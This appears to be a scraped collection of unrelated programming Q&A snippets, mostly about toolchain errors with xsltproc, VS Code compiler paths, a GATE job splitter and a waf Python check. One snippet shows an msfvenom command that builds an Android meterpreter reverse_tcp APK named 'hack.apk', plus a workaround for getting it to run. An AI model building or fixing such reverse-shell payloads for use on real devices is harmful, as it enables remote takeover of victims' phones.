Using LibXSLT (xsltproc) as an external engine in Altova's XMLSpy - xslt

I am trying to use LibXSLT as an external engine in Altova's XMLSpy, but keep getting an IO error when merging. What am I doing wrong?

Switched to the following runline, the additional "file:///" before the -o parameter seems to do the trick:
X:\LibXslt\Xsltproc.exe -o file:///%2 %3 %1


How to fix Compile path issue in M1

When I run C++ in VScode it shows:
Unable to resolve configuration with compilerPath "/Library/Developer/CommandLineTools/usr/bin". Using "/opt/homebrew/bin/gcc-11" instead.
[2/10/2022, 12:58:19 AM] Unable to resolve configuration with compilerPath "/Library/Developer/CommandLineTools/usr/bin". Using "/opt/homebrew/bin/gcc-11" instead.
Further, when I try to run C++ code it shows:
Unable to find executable for '/Users/dharshanm/Documents/VS Studio codes/build/Debug/outDebug'

Unable to resolve configuration with compiler Path

I have been getting this error message after installing VS code (New computer just reinstalling things) and I ran into this error message after installing splashkit + the c++ extension:
Unable to resolve configuration with compilerPath: C:/Users/willi/Documents/Code/102/Test/g++.exe
I would imagine I need to change the path variable but I am not sure.
EDIT: I get this error message after using the command:
skm clang++ program.cpp -o One
I'm sure I am missing something easy here, but I haven't ran into this one before.

How to handle gjs error parsing clusterplatform option?

I am using gjs-1.52.5 to split GATE macro for multi-core computation with condor HPC platform. I follow the guide from openGATE instruction of gjs from here:
But there is always an error like following:
gjs -numberofsplits 5 -c condor -condorscript /home/goldan/GATE/ClusterP/LinesSource7-condor.script LinesSource7.mac
(gjs:27315): Gjs-ERROR **: 12:37:48.562: option parsing failed: Error parsing option -c
Trace/breakpoint trap (core dumped)
I have no idea about where is the problem with option -c, any help will be highly appreciated!
It seems you are invoking /usr/bin/gjs which is an entirely different program and not the GATE Job Splitter. Check your PATH environment variable.

How do i solve msfvenom no options erro?

I write this code in termux :
msfvenom -p android/meterpreter/reverse_tcp LHOST=myip LPORT=port -o hack.apk
And in asnswer :
Error : no options
How can i solve?
There is an easy fix for this error as per my experience
If you installed metasploit-framework correctly the following workaround WILL work
navigate to the metasploit-framework directory usually, cd ~/metasploit-framework should do the job
Run the same command using 'ruby' i.e. ruby msfvenom -p android/meterpreter/reverse_tcp LHOST=myip LPORT=port -o hack.apk
This shall fix the error you mentioned but note that you might have installation errors in metasploit-framework as I have had too

Checking of python fails as: testing of pyembed fails

When I try to do a waf configuration, I get the following error:
Asking python-config for pyembed '--cflags --libs --ldflags' flags :
yes Testing pyembed configuration:Could not build a python embedded
The error is difficult to understand and solve. Can anyone please help me to fix this error?